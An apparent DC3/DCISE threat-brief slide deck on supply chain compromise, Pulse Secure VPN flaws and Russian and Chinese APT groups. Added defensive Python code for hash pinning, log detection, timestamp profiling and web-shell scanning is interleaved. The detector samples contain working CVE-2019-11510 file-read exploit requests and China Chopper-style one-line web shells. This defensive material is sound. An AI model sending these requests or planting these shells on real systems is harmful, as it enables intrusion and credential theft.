DoD Cyber Crime Center (DC3)
UNCLASSIFIED
Threat Brief
Mr. John Stoner
Deputy Director, DCISE
[email protected]
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
Disclaimer
◼ The information contained herein represents unclassified, publicly available information and does not contain USG- or DoD-sourced information.
◼ Any specific product, process, or service referenced by this server, that is not provided by the U.S. Government, does not constitute or imply an endorsement by DC3/DCISE, the Department of Defense or the United States Government of the product, process, or service, or its producer or provider. Additionally, any information or opinions expressed in any referenced document not published by the Government do not necessarily constitute or reflect agreement or concurrence by DC3/DCISE, the Department of Defense or the United States Government as to their accuracy or opinion content.
11/12/2019
Agenda
◼ DC3 (DoD Cyber Crime Center) brief overview
◼ DoD-DIB (Defense Industrial Base) Collaborative
Information Sharing Environment (DCISE) brief overview
◼ Advanced Persistent Threat (APT) summary
◼ Russian APT overview
◼ Chinese APT overview
◼ Deep Panda APT overview
◼ Questions and Discussion
◼ Additional Resources
DC3 Overview
◼ A DoD technical center for digital and multimedia (D/MM) forensics, cyber
training, technical solutions development, and cyber analytics supporting
DoD and National requirements in:
• Law Enforcement and Counterintelligence (LE/CI)
• Document and Media Exploitation (DOMEX) and Counterterrorism (CT)
• Cybersecurity (CS) and Critical Infrastructure Protection (CIP)
◼ DoD’s single repository for all defense contractor mandatory cyber incident
reports; operational focal point for DIB voluntary sharing program
◼ SECDEF designated lead for the DoD Vulnerability Disclosure Program (VDP)
◼ One of seven NSPD-54 designated Federal Cyber Centers
DC3 Directorates
DIB Collaboration
What is DC3's role?
◼ Operational focal point for the voluntary partnership of ~650 Cleared Defense Contractors (CDCs)
• Guidance: DoDI 5205.13, 32 CFR Part 236, and Framework Agreements
◼ Single repository for ALL mandatory cyber incident reports affecting CDC unclassified networks
• Guidance: DFARS 252.204-7012
◼ All reporting is submitted via the Incident Collection Format (ICF) at https://dibnet.dod.mil
Basis for DC3 DIB products and analytical conclusions:
◼ Analysis of nation-state Advanced Persistent Threat (APT) cyber events affecting the DIB since February 2008
• Performed ~42,000 hours of no-cost forensics and malware analysis
• Published ~9,614 cyber reports
• Shared ~356,404 actionable, non-attributional indicators
• Informed by multiple USG data streams (law enforcement, intelligence, counterintelligence) and industry cyber threat reports
DCISE Services
◼ DIBNET: online portal for incident reporting and for accessing DCISE threat products
◼ A2A and B2B meetings: tailored to a Partner's cyber team and the specific threats targeting its networks (Analyst-to-Analyst), or held with executives to discuss cyber defense (Business-to-Business)
◼ Technical Exchanges: interactive industry and government forum for deep technical discussion on a wide variety of cyber threat related topics
◼ Threat Products: cyber threat products, warnings, and administrative notices to strengthen cybersecurity
◼ DIB Technical Teleconferences: DIB Partners and DCISE analysts address current adversary techniques and trends
Threats
Supply Chain Risks
◼ Supply chain intrusions exploit trust: the victim runs the code because of who delivered it, not because the code was inspected
◼ Actors compromise a component of a trusted delivery process (build system, update server, signing step) rather than attacking the end target directly
◼ Example: the 2017 CCleaner compromise. The attackers' access to the vendor's environment dates to March 2017; a backdoored build, carrying a valid code signature, later shipped through the normal update channel
◼ Avast's CTO confirmed 2.27 million downloads of the infected version
◼ The broad infection was only the first stage; the second-stage payload was delivered to a short list of targeted companies:
◼ Akamai, Cisco, D-Link, Google, HTC, Linksys, Microsoft, Samsung, Sony, and VMware
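One check a practitioner would want against exactly this kind of compromise, added here as an example (not code from the brief, from Avast, or from Piriform): verify every downloaded artifact against a hash pinned from a source the delivery channel cannot alter, and fail closed on anything unknown. A valid code signature is deliberately not treated as sufficient, since the CCleaner implant shipped signed. The file name, the manifest, and the two "builds" below are constructed for the example.

```python
"""Verify a software artifact against a hash pinned out of band.

Added example, not code from the DC3 brief or from Avast/Piriform. It assumes
the organization keeps a SHA256SUMS-style manifest, obtained independently of
the download channel when a build was approved, and checks a downloaded file
against it before installation. The two "builds" are constructed bytes standing
in for a clean release and a tampered release of the same version; the file
name is hypothetical.
"""
import hashlib
import hmac
import re
from typing import Dict, Optional


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Constructed artifacts. Both carry the same embedded version string, as a
# trojanized build would; only the trailing bytes differ.
CLEAN_BUILD = b"PRODUCT-INSTALLER v5.33\x00" + bytes(range(64))
TAMPERED_BUILD = b"PRODUCT-INSTALLER v5.33\x00" + bytes(range(60)) + b"\xde\xad\xbe\xef"

# Pinned manifest in sha256sum format ("<hex>  <name>"). Derived from CLEAN_BUILD
# here so the example is self-contained; in practice the hash comes from a source
# the download channel cannot alter (vendor out-of-band publication, internal
# approval record), never from the download itself.
PINNED_MANIFEST = f"{sha256_hex(CLEAN_BUILD)}  product-installer-5.33.exe\n"

MANIFEST_LINE = re.compile(r"^([0-9a-fA-F]{64})\s+\*?(\S+)$")
VERSION_RE = re.compile(rb"v(\d+\.\d+)")


def parse_manifest(text: str) -> Dict[str, str]:
    """Map file name -> expected sha256 (lowercase); skip blanks and comments."""
    pinned: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = MANIFEST_LINE.match(line)
        if not m:
            raise ValueError(f"malformed manifest line: {raw!r}")
        pinned[m.group(2)] = m.group(1).lower()
    return pinned


def embedded_version(data: bytes) -> Optional[str]:
    """Version string as the installer would report it; identical for both builds."""
    m = VERSION_RE.search(data)
    return m.group(1).decode() if m else None


def verify_artifact(name: str, data: bytes, manifest_text: str) -> str:
    """Return 'ok', 'unknown-artifact', or 'hash-mismatch'. Unknown fails closed."""
    expected = parse_manifest(manifest_text).get(name)
    if expected is None:
        return "unknown-artifact"
    actual = sha256_hex(data)
    # Constant-time comparison; cheap, and avoids early-exit on the hex digest.
    return "ok" if hmac.compare_digest(actual, expected) else "hash-mismatch"


if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_BUILD), ("tampered", TAMPERED_BUILD)):
        print(label, embedded_version(blob),
              verify_artifact("product-installer-5.33.exe", blob, PINNED_MANIFEST))
```

The version check is there to make the failure mode concrete: both builds report the same version, and a signature check would pass both, so only the pinned hash distinguishes them.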
DoD-Defense Industrial Base
Collaborative Information Sharing Environment (DCISE)
DC3Slide 10
UNCLASSIFIED
UNCLASSIFIED
UNCLASSIFIED
2018 - Supply Chain Survey
Reference: 2018 CrowdStrike Supply Chain Report
Supply Chain Targeting
◼ Since 2013, the Chinese government has pressured US Information and Communications Technology (ICT) companies to:
• Surrender source code and store data on Chinese servers
• Invest in Chinese companies
• Permit security audits of ICT products by government agencies
◼ Cyberspace is a preferred operational domain for economic espionage, but it is only one of many
◼ Sophisticated threat actors combine cyber exploitation with supply chain operations, human recruitment, and the acquisition of knowledge by foreign students as part of a strategic technology acquisition program
Pulse Secure VPN
◼ Pulse Secure (Pulse Connect Secure) is an SSL VPN widely deployed in enterprise environments
◼ Multiple APT actors have weaponized CVE-2019-11510 (pre-authentication arbitrary file read) and CVE-2019-11539 (post-authentication command injection) in Pulse Connect Secure, together with the related CVE-2018-13379 (pre-authentication file read) in Fortinet FortiOS SSL VPN, to retrieve files and achieve remote code execution
◼ Files retrievable through the file-read flaws include session databases and cached credentials, which allow interception and hijacking of encrypted VPN sessions
◼ Impacted products: Pulse Connect Secure 8.1RX, 8.2RX, 8.3RX, and 9.0RX, and Pulse Policy Secure 5.1RX, 5.2RX, 5.3RX, 5.4RX, and 9.0RX
◼ Working exploits are already available in Metasploit and similar platforms
◼ CVE-2019-11508 and CVE-2019-11538 can be mitigated as a workaround by disabling the file share features; this workaround does not address CVE-2019-11510
◼ CVE-2019-11510 has security patches available from Pulse Secure's download center. Patching is the only complete fix; an appliance that was internet-exposed while unpatched should be treated as compromised, with VPN credentials and session secrets reset after patching
◼ https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF
◼ https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications
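Detection logic for the CVE-2019-11510 file-read pattern, added here as an example and not taken from the brief, from Pulse Secure, or from the advisories above. The URL shape (a /dana-na/ request that reaches /dana/html5acc/guacamole/ and then traverses with ../) and the target file names are from public reporting on the flaw; the log lines are constructed in Apache combined-log style.

```python
"""Flag CVE-2019-11510 exploitation attempts in appliance or reverse-proxy access logs.

Added example, not code from the DC3 brief, from Pulse Secure, or from the
advisories linked above. The URL shape and the file names below come from
public reporting on the flaw; the log lines are constructed for this example.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Files the public exploit is known to pull from an unpatched appliance.
SENSITIVE_PATHS = (
    "/etc/passwd",
    "/etc/hosts",
    "/data/runtime/mtmp/lmdb/dataa/data.mdb",      # session database
    "/data/runtime/mtmp/lmdb/randomVal/data.mdb",
    "/data/runtime/mtmp/system",                   # cached plaintext credentials
)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample: two successful reads, one benign login-page hit, and one
# double-encoded attempt that the appliance rejected.
SAMPLE_LOG = [
    '203.0.113.10 - - [26/Aug/2019:10:14:02 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1" 200 1742',
    '203.0.113.10 - - [26/Aug/2019:10:14:05 +0000] "GET /dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/system?/dana/html5acc/guacamole/ HTTP/1.1" 200 52103',
    '198.51.100.7 - - [26/Aug/2019:10:20:11 +0000] "GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1" 200 4812',
    '192.0.2.44 - - [26/Aug/2019:11:02:44 +0000] "GET /dana-na/%252e%252e/dana/html5acc/guacamole/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/hosts?/dana/html5acc/guacamole/ HTTP/1.1" 403 0',
]


def decode_path(path: str) -> str:
    """Percent-decode until stable so double-encoded ../ sequences are seen."""
    prev = None
    while prev != path:
        prev, path = path, unquote(path)
    return path


def classify_request(path: str, status: str) -> Optional[str]:
    """None for benign requests, otherwise 'attempt' or 'likely-successful'."""
    decoded = decode_path(path)
    traversal = "/dana/html5acc/guacamole/" in decoded and "../" in decoded
    target = next((p for p in SENSITIVE_PATHS if p in decoded), None)
    if not traversal and target is None:
        return None
    # A 200 on a sensitive file means the appliance served it: assume data loss.
    if status == "200" and target is not None:
        return "likely-successful"
    return "attempt"


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue   # unparseable line; a real pipeline would count these
        verdict = classify_request(m["path"], m["status"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "verdict": verdict,
                             "path": decode_path(m["path"])})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['verdict']:18} {f['ip']:14} {f['path']}")
```

A "likely-successful" hit on the session database or the cached-credential file is the trigger for resetting credentials and invalidating sessions, not just patching.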
Advanced Persistent Threats
◼ Cyber operations are a logical extension of traditional nation-state espionage: the tradecraft is new, the objective of spying is not
◼ "State sponsored groups may target organizations or governments to steal financial information, defense information, information that would grant a geopolitical economic or technological advantage, or any information that would be of use in intelligence or counterintelligence operations"
◼ Long patience
◼ Deep pockets
◼ Full backing of national assets
Threat Vectors for APTs
◼ Spearphishing
◼ Strategic web compromise
◼ Social engineering
◼ Zero-day exploits
◼ Domain spoofing
◼ Compromise web servers
◼ Weaponized Office documents
◼ SQL injection
◼ Web vulnerabilities
Notable Russian APTs
◼ APT 28 – aka Sofacy and Fancy Bear
• Suspected Russian state-sponsored group, active since at least 2007
• Most APT 28 malware was compiled Monday through Friday between 0800 and 1800 in the UTC+4 time zone, which matched working hours in Moscow and Saint Petersburg at the time of the analysis
• APT 28 relies on spear phishing or zero-day exploits to compromise victim systems initially
• Publicly linked by US authorities to the VPNFilter router botnet; NotPetya has been attributed to Russian military intelligence, though most vendors credit the related GRU group tracked as Sandworm rather than APT 28 itself
◼ APT 29 – aka Cozy Bear, The Dukes (operators of the CozyDuke and CosmicDuke malware families)
• Suspected Russian group that is adaptive and disciplined; it hides its activity on a victim's network, communicating infrequently and with obfuscation that resembles legitimate traffic
• One of the most evolved and capable threat groups
• Deploys new backdoor builds to fix its own bugs and add features; in effect, it patches its malware
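The working-hours analysis behind the APT 28 UTC+4 observation, as an added example (not code from the brief or from the FireEye report it summarizes): read each sample's PE compile timestamp and bucket it by weekday and hour in an assumed time zone. The sample "files" are constructed minimal PE headers, not malware. Compile timestamps are trivially forged and some toolchains zero them, so this is one weak signal to combine with others, not proof of origin.

```python
"""Profile PE compile timestamps against a working-hours hypothesis.

Added example, not code from the DC3 brief or from the FireEye APT28 report the
slide draws on. It reads the COFF TimeDateStamp from each PE file and reports
how many were built Monday-Friday 08:00-18:00 in a chosen UTC offset. The
"files" are minimal constructed PE headers.
"""
import struct
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Optional


def make_minimal_pe(timestamp: int) -> bytes:
    """Build a stub: DOS header with e_lfanew, then a COFF header carrying the timestamp."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)   # e_lfanew: PE signature at offset 64
    # Signature, Machine (i386), NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<IHHIIIHH", 0x00004550, 0x014C, 0, timestamp, 0, 0, 0, 0)
    return bytes(dos) + coff


def pe_timestamp(data: bytes) -> Optional[int]:
    """Return the COFF TimeDateStamp (seconds since 1970 UTC), or None if not a PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (pe_off,) = struct.unpack_from("<I", data, 0x3C)
    if pe_off + 24 > len(data) or data[pe_off:pe_off + 4] != b"PE\x00\x00":
        return None
    (ts,) = struct.unpack_from("<I", data, pe_off + 8)
    return ts


def working_hours_profile(samples: List[bytes], utc_offset_hours: int) -> Dict[str, object]:
    """Count samples built Mon-Fri 08:00-18:00 local to the given UTC offset."""
    tz = timezone(timedelta(hours=utc_offset_hours))
    total = in_hours = 0
    weekday_hist = [0] * 7    # Monday = 0
    hour_hist = [0] * 24
    for blob in samples:
        ts = pe_timestamp(blob)
        if ts is None or ts == 0:   # not a PE, or timestamp stripped by the toolchain
            continue
        local = datetime.fromtimestamp(ts, tz)
        total += 1
        weekday_hist[local.weekday()] += 1
        hour_hist[local.hour] += 1
        if local.weekday() < 5 and 8 <= local.hour < 18:
            in_hours += 1
    return {
        "samples": total,
        "in_working_hours": in_hours,
        "fraction": (in_hours / total) if total else 0.0,
        "weekday_hist": weekday_hist,
        "hour_hist": hour_hist,
    }


def _local_epoch(y: int, mo: int, d: int, h: int, mi: int, offset: int) -> int:
    """Epoch seconds for a wall-clock time in a fixed UTC offset (builds the corpus)."""
    return int(datetime(y, mo, d, h, mi, tzinfo=timezone(timedelta(hours=offset))).timestamp())


# Constructed corpus: three UTC+4 working-hours builds, a Saturday build, a
# 02:10 build, a zeroed timestamp, and a non-PE blob.
SAMPLES = [
    make_minimal_pe(_local_epoch(2014, 10, 14, 9, 30, 4)),   # Tue 09:30 UTC+4
    make_minimal_pe(_local_epoch(2014, 10, 15, 14, 5, 4)),   # Wed 14:05 UTC+4
    make_minimal_pe(_local_epoch(2014, 10, 16, 17, 45, 4)),  # Thu 17:45 UTC+4
    make_minimal_pe(_local_epoch(2014, 10, 18, 11, 0, 4)),   # Sat 11:00 UTC+4
    make_minimal_pe(_local_epoch(2014, 10, 13, 2, 10, 4)),   # Mon 02:10 UTC+4
    make_minimal_pe(0),                                      # stripped timestamp
    b"\x7fELF" + b"\x00" * 84,                               # not a PE at all
]

if __name__ == "__main__":
    for offset in (4, 0, -5):
        p = working_hours_profile(SAMPLES, offset)
        print(f"UTC{offset:+d}: {p['in_working_hours']}/{p['samples']} in working hours")
```

Running the same corpus under several offsets is the point: the hypothesis is only interesting if one zone fits markedly better than the others, and the fit should be checked against a large sample set rather than a handful.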
Chinese APT Summary
◼ Chinese state-linked collection targets proprietary data from both non-governmental organizations and governments to feed military and industrial modernization
◼ One widely reported cluster of Chinese intelligence-linked activity has been tracked under many vendor names, including Winnti, PassCV, APT17, Axiom, BARIUM, Wicked Panda, and GREF
◼ Researchers assess that the "Winnti umbrella" spans several distinct groups (tracked as Winnti, Axiom, Wicked Panda, and others) that share tooling such as the ShadowPad backdoor, use similar TTPs, and in some cases have shared portions of the same infrastructure
Deep Panda, APT 19, Shell Crew, PinkPanther
◼ Deep Panda began targeting the healthcare, aerospace, and energy sectors around 2012
◼ The intrusion into Anthem has been attributed to Deep Panda, and the group is a suspected culprit in the OPM breach as well
◼ Possibly behind the 2017 CCleaner supply chain compromise
◼ Continues to evolve its technical TTPs
◼ Probably uses VPNs to mask the origin of attacks and obfuscate attribution
◼ Commonly uses the China Chopper web shell: a tiny server-side script (ASPX, PHP, or JSP variants) that executes whatever code the operator's client sends in a POST body, giving file management and command execution through an ordinary-looking web request
◼ https://www.cyber.nj.gov/threat-profiles/trojan-variants/china-chopper
◼ Recorded Future observed intense activity related to the Apache Struts vulnerability in several Chinese (and Russian) underground forums
◼ Equifax confirmed that its 2017 breach resulted from an unpatched Apache Struts vulnerability
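A content scan for China Chopper style shells on a web root, added as an example and not part of the brief or the linked NJCCIC profile. The ASPX and PHP patterns follow the widely published one-liner variants and the JSP pattern matches the file-drop one-liner distributed with the tool; the web root contents and parameter names are constructed.

```python
"""Scan web content for China Chopper style one-line web shells.

Added example, not code from the DC3 brief or the NJCCIC profile linked above.
China Chopper's server component is a tiny script that evaluates whatever the
operator's client POSTs under a chosen parameter name. File contents below are
constructed and the parameter names are hypothetical.
"""
import re
from typing import Dict, List

# Server-side code that evaluates or executes attacker-controlled request data.
SIGNATURES = {
    "aspx-eval-request": re.compile(
        r'eval\s*\(\s*Request\s*\.\s*Item\s*\[[^\]]*\]\s*,\s*"unsafe"\s*\)', re.I),
    "php-eval-request": re.compile(
        r'@?\s*(?:eval|assert)\s*\(\s*\$_(?:POST|REQUEST|GET)\s*\[[^\]]*\]\s*\)', re.I),
    "jsp-file-drop": re.compile(
        r'FileOutputStream\s*\([^;]*\)\s*\.\s*write\s*\(\s*request\s*\.\s*getParameter', re.I),
}

# Constructed web root: two shells and a JSP dropper hidden among normal files.
WEB_ROOT: Dict[str, str] = {
    "images/help.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["cmd_x7"],"unsafe");%>',
    "uploads/cache.php": "<?php @eval($_POST['k3y']);?>",
    "tmp/s.jsp": ('<%if(request.getParameter("f")!=null)(new java.io.FileOutputStream('
                  'application.getRealPath("\\\\")+request.getParameter("f")))'
                  '.write(request.getParameter("t").getBytes());%>'),
    "Default.aspx": ('<%@ Page Language="C#" AutoEventWireup="true" CodeBehind="Default.aspx.cs" '
                     'Inherits="Site._Default" %>\n<html><body>Welcome</body></html>'),
    "inc/db.php": ("<?php\n$conn = new mysqli($host, $user, $pass, $db);\n"
                   "if ($conn->connect_error) { die('connect failed'); }\n?>"),
}


def scan_content(name: str, content: str) -> List[Dict[str, str]]:
    """One finding per matching signature; a tiny file is the classic shell shape."""
    hits = []
    for sig_name, rx in SIGNATURES.items():
        m = rx.search(content)
        if m:
            confidence = "high" if len(content) < 256 else "medium"
            hits.append({"file": name, "signature": sig_name,
                         "confidence": confidence, "match": m.group(0)})
    return hits


def scan_tree(files: Dict[str, str]) -> List[Dict[str, str]]:
    """Scan a name -> content mapping (as read from the web root) in a stable order."""
    findings = []
    for name in sorted(files):
        findings.extend(scan_content(name, files[name]))
    return findings


if __name__ == "__main__":
    for f in scan_tree(WEB_ROOT):
        print(f"{f['confidence']:6} {f['signature']:18} {f['file']}: {f['match']}")
```

Pair a file scan like this with web log review: the shell's traffic is a POST to a file that should never receive POSTs, often from one source IP, which is visible even when the operator renames the parameter.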
Before Threat Intelligence
Final Thoughts
◼ APTs use a variety of methodologies to compromise victims
◼ Spearphishing is a vector used by all threat actors
◼ Security professionals should implement standardized, common defensive practices (patching, MFA)
◼ There are a variety of sources for cyber threat information and recommended mitigations
◼ Security basics must be in place before cyber threat intelligence adds value
◼ No organization is immune to cyber threats or attacks
Questions?
410-981-1085
Toll Free DCISE Hotline: (877) 838-2174
DCISE Email: [email protected]
Resources
◼ Threat Resources
• https://cyber-peace.org/wp-content/uploads/2018/02/APT-Groups-and-Operations.xlsx
• https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview#
• https://www.wired.com/2016/03/inside-cunning-unprecedented-hack-ukraines-power-grid/
• https://www.wired.com/story/notpetya-cyberattack-ukraine-russia-code-crashed-the-world
• https://www.cisco.com/c/dam/m/hu_hu/campaigns/security-hub/pdf/acr-2018.pdf
• https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf
• https://github.com/fdiskyou/threat-INTel/blob/master/2016/ICIT-Brief-Know-Your-Enemies-2.0.pdf
• https://drive.google.com/file/d/0B1fYfQFfD2khdG4taVYtbDFJQzQ/view?usp=sharing
• https://media.dau.mil/media/DCISE+Cyber+Threat+Intel+and+APTs+101_v2/0_9b59yo0m
◼ Cybersecurity Information Resources
• https://niccs.us-cert.gov/workforce-development/cyber-security-workforce-framework/training-education-and-awareness
• https://www.sans.org/security-awareness-training
• https://securityawareness.usalearning.gov/cybersecurity/index.htm
• https://www.cdse.edu/toolkits/cybersecurity/training.html
• https://cybernetsecurity.com/industry-papers/CIS-Controls%20Version-7-cc-FINAL.PDF
• https://www.cyber.gov.au/advice/how-to-mitigate-cyber-security-incidents
• https://www.ftc.gov/tips-advice/business-center/small-businesses